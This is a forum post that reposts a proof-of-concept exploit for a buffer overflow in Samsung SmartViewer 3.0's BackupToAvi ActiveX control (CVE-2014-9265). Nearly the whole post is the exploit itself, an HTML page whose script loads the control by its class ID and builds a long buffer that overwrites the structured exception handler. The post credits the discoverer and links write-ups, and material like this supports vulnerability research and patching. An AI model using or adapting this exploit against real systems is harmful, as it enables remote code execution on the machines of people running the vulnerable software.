Jump to content
Aerosol

Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution

Recommended Posts

<html>
<!--
Samsung SmartViewer BackupToAvi Remote Code Execution PoC
PoC developed by Praveen Darshanam

For more details refer
http://darshanams.blogspot.com
http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html
Original Vulnerability Discovered by rgod
Vulnerable: Samsung SmartViewer 3.0
Tested on Windows 7 Ultimate N SP1
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265
-->

<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object>
<script >
var payload_length = 15000;
var arg1=1;
var arg2=1;
var arg3=1;
//blank strings
var junk = "";
var buf1 = "";
var buf2 = "";

//offset to SE is 156, initial analysis using metasploit cyclic pattern
for (i=0; i<156; i++)
{
buf1 += "A";
}
var nseh = "DD";
var seh = "\x87\x10"; //from Vulnerable DLL
junk = buf1 + nseh + seh;

//remaining buffer
for (j=0; j<(payload_length-junk.length); j++)
{
buf2 += "B";
}
//final malicious buffer
var fbuff = junk + buf2;
target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff);

</script>
</html>

Source

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...